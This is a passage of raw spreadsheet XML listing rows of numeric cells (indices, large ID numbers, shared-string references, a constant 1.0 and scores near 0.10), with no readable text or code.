        <v>2744.0</v>
      </c>
      <c r="B21508" s="2">
        <v>3.5028868E7</v>
      </c>
      <c r="C21508" s="2" t="s">
        <v>20762</v>
      </c>
      <c r="D21508" s="2">
        <v>1.0</v>
      </c>
      <c r="E21508" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21508" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="21509" ht="15.75" customHeight="1">
      <c r="A21509" s="1">
        <v>7413.0</v>
      </c>
      <c r="B21509" s="2">
        <v>5.1136777E7</v>
      </c>
      <c r="C21509" s="2" t="s">
        <v>20763</v>
      </c>
      <c r="D21509" s="2">
        <v>1.0</v>
      </c>
      <c r="E21509" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21509" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="21510" ht="15.75" customHeight="1">
      <c r="A21510" s="1">
        <v>18921.0</v>
      </c>
      <c r="B21510" s="2">
        <v>5.4219381E7</v>
      </c>
      <c r="C21510" s="2" t="s">
        <v>20764</v>
      </c>
      <c r="D21510" s="2">
        <v>1.0</v>
      </c>
      <c r="E21510" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21510" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="21511" ht="15.75" customHeight="1">
      <c r="A21511" s="1">
        <v>19843.0</v>
      </c>
      <c r="B21511" s="2">
        <v>5.7086198E7</v>
      </c>
      <c r="C21511" s="2" t="s">
        <v>20765</v>
      </c>
      <c r="D21511" s="2">
        <v>1.0</v>
      </c>
      <c r="E21511" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21511" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="21512" ht="15.75" customHeight="1">
      <c r="A21512" s="1">
        <v>24455.0</v>
      </c>
      <c r="B21512" s="2">
        <v>1.0934969E7</v>
      </c>
      <c r="C21512" s="2" t="s">
        <v>20766</v>
      </c>
      <c r="D21512" s="2">
        <v>1.0</v>
      </c>
      <c r="E21512" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21512" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="21513" ht="15.75" customHeight="1">
      <c r="A21513" s="1">
        <v>26019.0</v>
      </c>
      <c r="B21513" s="2">
        <v>1.5373678E7</v>
      </c>
      <c r="C21513" s="2" t="s">
        <v>20767</v>
      </c>
      <c r="D21513" s="2">
        <v>1.0</v>
      </c>
      <c r="E21513" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21513" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="21514" ht="15.75" customHeight="1">
      <c r="A21514" s="1">
        <v>26633.0</v>
      </c>
      <c r="B21514" s="2">
        <v>1.8043994E7</v>
      </c>
      <c r="C21514" s="2" t="s">
        <v>20768</v>
      </c>
      <c r="D21514" s="2">
        <v>1.0</v>
      </c>
      <c r="E21514" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21514" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="21515" ht="15.75" customHeight="1">
      <c r="A21515" s="1">
        <v>654.0</v>
      </c>
      <c r="B21515" s="2">
        <v>1.9989172E7</v>
      </c>
      <c r="C21515" s="2" t="s">
        <v>20769</v>
      </c>
      <c r="D21515" s="2">
        <v>1.0</v>
      </c>
      <c r="E21515" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21515" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="21516" ht="15.75" customHeight="1">
      <c r="A21516" s="1">
        <v>2006.0</v>
      </c>
      <c r="B21516" s="2">
        <v>3.0655055E7</v>
      </c>
      <c r="C21516" s="2" t="s">
        <v>20770</v>
      </c>
      <c r="D21516" s="2">
        <v>1.0</v>
      </c>
      <c r="E21516" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21516" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="21517" ht="15.75" customHeight="1">
      <c r="A21517" s="1">
        <v>2252.0</v>
      </c>
      <c r="B21517" s="2">
        <v>3.2361703E7</v>
      </c>
      <c r="C21517" s="2" t="s">
        <v>20771</v>
      </c>
      <c r="D21517" s="2">
        <v>1.0</v>
      </c>
      <c r="E21517" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21517" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="21518" ht="15.75" customHeight="1">
      <c r="A21518" s="1">
        <v>3225.0</v>
      </c>
      <c r="B21518" s="2">
        <v>3.7332153E7</v>
      </c>
      <c r="C21518" s="2" t="s">
        <v>20772</v>
      </c>
      <c r="D21518" s="2">
        <v>1.0</v>
      </c>
      <c r="E21518" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21518" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="21519" ht="15.75" customHeight="1">
      <c r="A21519" s="1">
        <v>4102.0</v>
      </c>
      <c r="B21519" s="2">
        <v>4.1324094E7</v>
      </c>
      <c r="C21519" s="2" t="s">
        <v>20773</v>
      </c>
      <c r="D21519" s="2">
        <v>1.0</v>
      </c>
      <c r="E21519" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21519" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="21520" ht="15.75" customHeight="1">
      <c r="A21520" s="1">
        <v>6452.0</v>
      </c>
      <c r="B21520" s="2">
        <v>4.8599948E7</v>
      </c>
      <c r="C21520" s="2" t="s">
        <v>20774</v>
      </c>
      <c r="D21520" s="2">
        <v>1.0</v>
      </c>
      <c r="E21520" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21520" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="21521" ht="15.75" customHeight="1">
      <c r="A21521" s="1">
        <v>13280.0</v>
      </c>
      <c r="B21521" s="2">
        <v>3.4405075E7</v>
      </c>
      <c r="C21521" s="2" t="s">
        <v>20775</v>
      </c>
      <c r="D21521" s="2">
        <v>1.0</v>
      </c>
      <c r="E21521" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21521" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="21522" ht="15.75" customHeight="1">
      <c r="A21522" s="1">
        <v>24183.0</v>
      </c>
      <c r="B21522" s="2">
        <v>1.0257519E7</v>
      </c>
      <c r="C21522" s="2" t="s">
        <v>20776</v>
      </c>
      <c r="D21522" s="2">
        <v>1.0</v>
      </c>
      <c r="E21522" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21522" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="21523" ht="15.75" customHeight="1">
      <c r="A21523" s="1">
        <v>27523.0</v>
      </c>
      <c r="B21523" s="2">
        <v>2.2168174E7</v>
      </c>
      <c r="C21523" s="2" t="s">
        <v>20777</v>
      </c>
      <c r="D21523" s="2">
        <v>1.0</v>
      </c>
      <c r="E21523" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21523" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="21524" ht="15.75" customHeight="1">
      <c r="A21524" s="1">
        <v>6096.0</v>
      </c>
      <c r="B21524" s="2">
        <v>4.7702584E7</v>
      </c>
      <c r="C21524" s="2" t="s">
        <v>20778</v>
      </c>
      <c r="D21524" s="2">
        <v>1.0</v>
      </c>
      <c r="E21524" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21524" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="21525" ht="15.75" customHeight="1">
      <c r="A21525" s="1">
        <v>8328.0</v>
      </c>
      <c r="B21525" s="2">
        <v>5.3643821E7</v>
      </c>
      <c r="C21525" s="2" t="s">
        <v>20779</v>
      </c>
      <c r="D21525" s="2">
        <v>1.0</v>
      </c>
      <c r="E21525" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21525" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="21526" ht="15.75" customHeight="1">
      <c r="A21526" s="1">
        <v>8747.0</v>
      </c>
      <c r="B21526" s="2">
        <v>5.4540187E7</v>
      </c>
      <c r="C21526" s="2" t="s">
        <v>20780</v>
      </c>
      <c r="D21526" s="2">
        <v>1.0</v>
      </c>
      <c r="E21526" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21526" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="21527" ht="15.75" customHeight="1">
      <c r="A21527" s="1">
        <v>9249.0</v>
      </c>
      <c r="B21527" s="2">
        <v>5.5473488E7</v>
      </c>
      <c r="C21527" s="2" t="s">
        <v>20781</v>
      </c>
      <c r="D21527" s="2">
        <v>1.0</v>
      </c>
      <c r="E21527" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21527" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="21528" ht="15.75" customHeight="1">
      <c r="A21528" s="1">
        <v>12813.0</v>
      </c>
      <c r="B21528" s="2">
        <v>3.1577918E7</v>
      </c>
      <c r="C21528" s="2" t="s">
        <v>20782</v>
      </c>
      <c r="D21528" s="2">
        <v>1.0</v>
      </c>
      <c r="E21528" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21528" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="21529" ht="15.75" customHeight="1">
      <c r="A21529" s="1">
        <v>33749.0</v>
      </c>
      <c r="B21529" s="2">
        <v>8588893.0</v>
      </c>
      <c r="C21529" s="2" t="s">
        <v>20783</v>
      </c>
      <c r="D21529" s="2">
        <v>1.0</v>
      </c>
      <c r="E21529" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21529" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="21530" ht="15.75" customHeight="1">
      <c r="A21530" s="1">
        <v>1009.0</v>
      </c>
      <c r="B21530" s="2">
        <v>2.3059485E7</v>
      </c>
      <c r="C21530" s="2" t="s">
        <v>20784</v>
      </c>
      <c r="D21530" s="2">
        <v>1.0</v>
      </c>
      <c r="E21530" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21530" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="21531" ht="15.75" customHeight="1">
      <c r="A21531" s="1">
        <v>2904.0</v>
      </c>
      <c r="B21531" s="2">
        <v>3.5808884E7</v>
      </c>
      <c r="C21531" s="2" t="s">
        <v>20785</v>
      </c>
      <c r="D21531" s="2">
        <v>1.0</v>
      </c>
      <c r="E21531" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21531" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="21532" ht="15.75" customHeight="1">
      <c r="A21532" s="1">
        <v>5347.0</v>
      </c>
      <c r="B21532" s="2">
        <v>4.5344396E7</v>
      </c>
      <c r="C21532" s="2" t="s">
        <v>20786</v>
      </c>
      <c r="D21532" s="2">
        <v>1.0</v>
      </c>
      <c r="E21532" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21532" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="21533" ht="15.75" customHeight="1">
      <c r="A21533" s="1">
        <v>15055.0</v>
      </c>
      <c r="B21533" s="2">
        <v>4.1667725E7</v>
      </c>
      <c r="C21533" s="2" t="s">
        <v>20787</v>
      </c>
      <c r="D21533" s="2">
        <v>1.0</v>
      </c>
      <c r="E21533" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21533" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="21534" ht="15.75" customHeight="1">
      <c r="A21534" s="1">
        <v>21106.0</v>
      </c>
      <c r="B21534" s="2">
        <v>1.8147666E7</v>
      </c>
      <c r="C21534" s="2" t="s">
        <v>20788</v>
      </c>
      <c r="D21534" s="2">
        <v>1.0</v>
      </c>
      <c r="E21534" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21534" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="21535" ht="15.75" customHeight="1">
      <c r="A21535" s="1">
        <v>29952.0</v>
      </c>
      <c r="B21535" s="2">
        <v>3607598.0</v>
      </c>
      <c r="C21535" s="2" t="s">
        <v>20789</v>
      </c>
      <c r="D21535" s="2">
        <v>1.0</v>
      </c>
      <c r="E21535" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21535" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="21536" ht="15.75" customHeight="1">
      <c r="A21536" s="1">
        <v>1858.0</v>
      </c>
      <c r="B21536" s="2">
        <v>2.9493043E7</v>
      </c>
      <c r="C21536" s="2" t="s">
        <v>20790</v>
      </c>
      <c r="D21536" s="2">
        <v>1.0</v>
      </c>
      <c r="E21536" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21536" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="21537" ht="15.75" customHeight="1">
      <c r="A21537" s="1">
        <v>3656.0</v>
      </c>
      <c r="B21537" s="2">
        <v>3.9331434E7</v>
      </c>
      <c r="C21537" s="2" t="s">
        <v>20791</v>
      </c>
      <c r="D21537" s="2">
        <v>1.0</v>
      </c>
      <c r="E21537" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21537" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="21538" ht="15.75" customHeight="1">
      <c r="A21538" s="1">
        <v>4382.0</v>
      </c>
      <c r="B21538" s="2">
        <v>4.2185715E7</v>
      </c>
      <c r="C21538" s="2" t="s">
        <v>20792</v>
      </c>
      <c r="D21538" s="2">
        <v>1.0</v>
      </c>
      <c r="E21538" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21538" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="21539" ht="15.75" customHeight="1">
      <c r="A21539" s="1">
        <v>18683.0</v>
      </c>
      <c r="B21539" s="2">
        <v>5.3592645E7</v>
      </c>
      <c r="C21539" s="2" t="s">
        <v>20793</v>
      </c>
      <c r="D21539" s="2">
        <v>1.0</v>
      </c>
      <c r="E21539" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21539" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="21540" ht="15.75" customHeight="1">
      <c r="A21540" s="1">
        <v>6508.0</v>
      </c>
      <c r="B21540" s="2">
        <v>4.8757614E7</v>
      </c>
      <c r="C21540" s="2" t="s">
        <v>20794</v>
      </c>
      <c r="D21540" s="2">
        <v>1.0</v>
      </c>
      <c r="E21540" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21540" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="21541" ht="15.75" customHeight="1">
      <c r="A21541" s="1">
        <v>2014.0</v>
      </c>
      <c r="B21541" s="2">
        <v>3.0721018E7</v>
      </c>
      <c r="C21541" s="2" t="s">
        <v>20795</v>
      </c>
      <c r="D21541" s="2">
        <v>1.0</v>
      </c>
      <c r="E21541" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21541" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21542" ht="15.75" customHeight="1">
      <c r="A21542" s="1">
        <v>2850.0</v>
      </c>
      <c r="B21542" s="2">
        <v>3.5496006E7</v>
      </c>
      <c r="C21542" s="2" t="s">
        <v>20796</v>
      </c>
      <c r="D21542" s="2">
        <v>1.0</v>
      </c>
      <c r="E21542" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21542" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21543" ht="15.75" customHeight="1">
      <c r="A21543" s="1">
        <v>7862.0</v>
      </c>
      <c r="B21543" s="2">
        <v>5.2386146E7</v>
      </c>
      <c r="C21543" s="2" t="s">
        <v>20797</v>
      </c>
      <c r="D21543" s="2">
        <v>1.0</v>
      </c>
      <c r="E21543" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21543" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21544" ht="15.75" customHeight="1">
      <c r="A21544" s="1">
        <v>11069.0</v>
      </c>
      <c r="B21544" s="2">
        <v>1.8341519E7</v>
      </c>
      <c r="C21544" s="2" t="s">
        <v>20798</v>
      </c>
      <c r="D21544" s="2">
        <v>1.0</v>
      </c>
      <c r="E21544" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21544" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21545" ht="15.75" customHeight="1">
      <c r="A21545" s="1">
        <v>11658.0</v>
      </c>
      <c r="B21545" s="2">
        <v>2331661.0</v>
      </c>
      <c r="C21545" s="2" t="s">
        <v>20799</v>
      </c>
      <c r="D21545" s="2">
        <v>1.0</v>
      </c>
      <c r="E21545" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21545" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21546" ht="15.75" customHeight="1">
      <c r="A21546" s="1">
        <v>12500.0</v>
      </c>
      <c r="B21546" s="2">
        <v>2.9605128E7</v>
      </c>
      <c r="C21546" s="2" t="s">
        <v>20800</v>
      </c>
      <c r="D21546" s="2">
        <v>1.0</v>
      </c>
      <c r="E21546" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21546" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21547" ht="15.75" customHeight="1">
      <c r="A21547" s="1">
        <v>14209.0</v>
      </c>
      <c r="B21547" s="2">
        <v>3.8256484E7</v>
      </c>
      <c r="C21547" s="2" t="s">
        <v>20801</v>
      </c>
      <c r="D21547" s="2">
        <v>1.0</v>
      </c>
      <c r="E21547" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21547" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21548" ht="15.75" customHeight="1">
      <c r="A21548" s="1">
        <v>15045.0</v>
      </c>
      <c r="B21548" s="2">
        <v>4.1601074E7</v>
      </c>
      <c r="C21548" s="2" t="s">
        <v>20802</v>
      </c>
      <c r="D21548" s="2">
        <v>1.0</v>
      </c>
      <c r="E21548" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21548" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21549" ht="15.75" customHeight="1">
      <c r="A21549" s="1">
        <v>15952.0</v>
      </c>
      <c r="B21549" s="2">
        <v>4.4750077E7</v>
      </c>
      <c r="C21549" s="2" t="s">
        <v>20803</v>
      </c>
      <c r="D21549" s="2">
        <v>1.0</v>
      </c>
      <c r="E21549" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21549" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21550" ht="15.75" customHeight="1">
      <c r="A21550" s="1">
        <v>22320.0</v>
      </c>
      <c r="B21550" s="2">
        <v>3.3994055E7</v>
      </c>
      <c r="C21550" s="2" t="s">
        <v>20804</v>
      </c>
      <c r="D21550" s="2">
        <v>1.0</v>
      </c>
      <c r="E21550" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21550" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21551" ht="15.75" customHeight="1">
      <c r="A21551" s="1">
        <v>22595.0</v>
      </c>
      <c r="B21551" s="2">
        <v>3.9395812E7</v>
      </c>
      <c r="C21551" s="2" t="s">
        <v>20805</v>
      </c>
      <c r="D21551" s="2">
        <v>1.0</v>
      </c>
      <c r="E21551" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21551" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21552" ht="15.75" customHeight="1">
      <c r="A21552" s="1">
        <v>23458.0</v>
      </c>
      <c r="B21552" s="2">
        <v>5.6969357E7</v>
      </c>
      <c r="C21552" s="2" t="s">
        <v>20806</v>
      </c>
      <c r="D21552" s="2">
        <v>1.0</v>
      </c>
      <c r="E21552" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21552" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21553" ht="15.75" customHeight="1">
      <c r="A21553" s="1">
        <v>24618.0</v>
      </c>
      <c r="B21553" s="2">
        <v>1.1460893E7</v>
      </c>
      <c r="C21553" s="2" t="s">
        <v>20807</v>
      </c>
      <c r="D21553" s="2">
        <v>1.0</v>
      </c>
      <c r="E21553" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21553" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21554" ht="15.75" customHeight="1">
      <c r="A21554" s="1">
        <v>25826.0</v>
      </c>
      <c r="B21554" s="2">
        <v>1.4769933E7</v>
      </c>
      <c r="C21554" s="2" t="s">
        <v>20808</v>
      </c>
      <c r="D21554" s="2">
        <v>1.0</v>
      </c>
      <c r="E21554" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21554" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21555" ht="15.75" customHeight="1">
      <c r="A21555" s="1">
        <v>29497.0</v>
      </c>
      <c r="B21555" s="2">
        <v>3.2700938E7</v>
      </c>
      <c r="C21555" s="2" t="s">
        <v>20809</v>
      </c>
      <c r="D21555" s="2">
        <v>1.0</v>
      </c>
      <c r="E21555" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21555" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21556" ht="15.75" customHeight="1">
      <c r="A21556" s="1">
        <v>29676.0</v>
      </c>
      <c r="B21556" s="2">
        <v>3.3994054E7</v>
      </c>
      <c r="C21556" s="2" t="s">
        <v>20804</v>
      </c>
      <c r="D21556" s="2">
        <v>1.0</v>
      </c>
      <c r="E21556" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21556" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21557" ht="15.75" customHeight="1">
      <c r="A21557" s="1">
        <v>32480.0</v>
      </c>
      <c r="B21557" s="2">
        <v>5.6969356E7</v>
      </c>
      <c r="C21557" s="2" t="s">
        <v>20806</v>
      </c>
      <c r="D21557" s="2">
        <v>1.0</v>
      </c>
      <c r="E21557" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21557" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21558" ht="15.75" customHeight="1">
      <c r="A21558" s="1">
        <v>32583.0</v>
      </c>
      <c r="B21558" s="2">
        <v>5783602.0</v>
      </c>
      <c r="C21558" s="2" t="s">
        <v>20810</v>
      </c>
      <c r="D21558" s="2">
        <v>1.0</v>
      </c>
      <c r="E21558" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21558" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21559" ht="15.75" customHeight="1">
      <c r="A21559" s="1">
        <v>33330.0</v>
      </c>
      <c r="B21559" s="2">
        <v>7565707.0</v>
      </c>
      <c r="C21559" s="2" t="s">
        <v>20811</v>
      </c>
      <c r="D21559" s="2">
        <v>1.0</v>
      </c>
      <c r="E21559" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21559" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="21560" ht="15.75" customHeight="1">
      <c r="A21560" s="1">
        <v>988.0</v>
      </c>
      <c r="B21560" s="2">
        <v>2.2876261E7</v>
      </c>
      <c r="C21560" s="2" t="s">
        <v>20812</v>
      </c>
      <c r="D21560" s="2">
        <v>1.0</v>
      </c>
      <c r="E21560" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21560" s="2">
        <v>0.1026365348399247</v>
      </c>
    </row>
    <row r="21561" ht="15.75" customHeight="1">
      <c r="A21561" s="1">
        <v>17116.0</v>
      </c>
      <c r="B21561" s="2">
        <v>4.8761396E7</v>
      </c>
      <c r="C21561" s="2" t="s">
        <v>20813</v>
      </c>
      <c r="D21561" s="2">
        <v>1.0</v>
      </c>
      <c r="E21561" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21561" s="2">
        <v>0.1026365348399247</v>
      </c>
    </row>
    <row r="21562" ht="15.75" customHeight="1">
      <c r="A21562" s="1">
        <v>31800.0</v>
      </c>
      <c r="B21562" s="2">
        <v>5.241881E7</v>
      </c>
      <c r="C21562" s="2" t="s">
        <v>20814</v>
      </c>
      <c r="D21562" s="2">
        <v>1.0</v>
      </c>
      <c r="E21562" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21562" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="21563" ht="15.75" customHeight="1">
      <c r="A21563" s="1">
        <v>5260.0</v>
      </c>
      <c r="B21563" s="2">
        <v>4.5113605E7</v>
      </c>
      <c r="C21563" s="2" t="s">
        <v>20815</v>
      </c>
      <c r="D21563" s="2">
        <v>1.0</v>
      </c>
      <c r="E21563" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21563" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="21564" ht="15.75" customHeight="1">
      <c r="A21564" s="1">
        <v>6628.0</v>
      </c>
      <c r="B21564" s="2">
        <v>4.9063021E7</v>
      </c>
      <c r="C21564" s="2" t="s">
        <v>20816</v>
      </c>
      <c r="D21564" s="2">
        <v>1.0</v>
      </c>
      <c r="E21564" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21564" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="21565" ht="15.75" customHeight="1">
      <c r="A21565" s="1">
        <v>10360.0</v>
      </c>
      <c r="B21565" s="2">
        <v>7562349.0</v>
      </c>
      <c r="C21565" s="2" t="s">
        <v>20817</v>
      </c>
      <c r="D21565" s="2">
        <v>1.0</v>
      </c>
      <c r="E21565" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21565" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="21566" ht="15.75" customHeight="1">
      <c r="A21566" s="1">
        <v>21002.0</v>
      </c>
      <c r="B21566" s="2">
        <v>1.7177072E7</v>
      </c>
      <c r="C21566" s="2" t="s">
        <v>20818</v>
      </c>
      <c r="D21566" s="2">
        <v>1.0</v>
      </c>
      <c r="E21566" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21566" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="21567" ht="15.75" customHeight="1">
      <c r="A21567" s="1">
        <v>29026.0</v>
      </c>
      <c r="B21567" s="2">
        <v>3.0101211E7</v>
      </c>
      <c r="C21567" s="2" t="s">
        <v>20819</v>
      </c>
      <c r="D21567" s="2">
        <v>1.0</v>
      </c>
      <c r="E21567" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21567" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="21568" ht="15.75" customHeight="1">
      <c r="A21568" s="1">
        <v>33923.0</v>
      </c>
      <c r="B21568" s="2">
        <v>9274287.0</v>
      </c>
      <c r="C21568" s="2" t="s">
        <v>20820</v>
      </c>
      <c r="D21568" s="2">
        <v>1.0</v>
      </c>
      <c r="E21568" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21568" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="21569" ht="15.75" customHeight="1">
      <c r="A21569" s="1">
        <v>1265.0</v>
      </c>
      <c r="B21569" s="2">
        <v>2.5263989E7</v>
      </c>
      <c r="C21569" s="2" t="s">
        <v>20821</v>
      </c>
      <c r="D21569" s="2">
        <v>1.0</v>
      </c>
      <c r="E21569" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21569" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="21570" ht="15.75" customHeight="1">
      <c r="A21570" s="1">
        <v>2949.0</v>
      </c>
      <c r="B21570" s="2">
        <v>3.6003491E7</v>
      </c>
      <c r="C21570" s="2" t="s">
        <v>20822</v>
      </c>
      <c r="D21570" s="2">
        <v>1.0</v>
      </c>
      <c r="E21570" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21570" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="21571" ht="15.75" customHeight="1">
      <c r="A21571" s="1">
        <v>2977.0</v>
      </c>
      <c r="B21571" s="2">
        <v>3.6111332E7</v>
      </c>
      <c r="C21571" s="2" t="s">
        <v>20823</v>
      </c>
      <c r="D21571" s="2">
        <v>1.0</v>
      </c>
      <c r="E21571" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21571" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="21572" ht="15.75" customHeight="1">
      <c r="A21572" s="1">
        <v>7565.0</v>
      </c>
      <c r="B21572" s="2">
        <v>5.1553734E7</v>
      </c>
      <c r="C21572" s="2" t="s">
        <v>20824</v>
      </c>
      <c r="D21572" s="2">
        <v>1.0</v>
      </c>
      <c r="E21572" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21572" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="21573" ht="15.75" customHeight="1">
      <c r="A21573" s="1">
        <v>10272.0</v>
      </c>
      <c r="B21573" s="2">
        <v>5.7623868E7</v>
      </c>
      <c r="C21573" s="2" t="s">
        <v>20825</v>
      </c>
      <c r="D21573" s="2">
        <v>1.0</v>
      </c>
      <c r="E21573" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21573" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="21574" ht="15.75" customHeight="1">
      <c r="A21574" s="1">
        <v>10496.0</v>
      </c>
      <c r="B21574" s="2">
        <v>1.1303655E7</v>
      </c>
      <c r="C21574" s="2" t="s">
        <v>20826</v>
      </c>
      <c r="D21574" s="2">
        <v>1.0</v>
      </c>
      <c r="E21574" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21574" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="21575" ht="15.75" customHeight="1">
      <c r="A21575" s="1">
        <v>14240.0</v>
      </c>
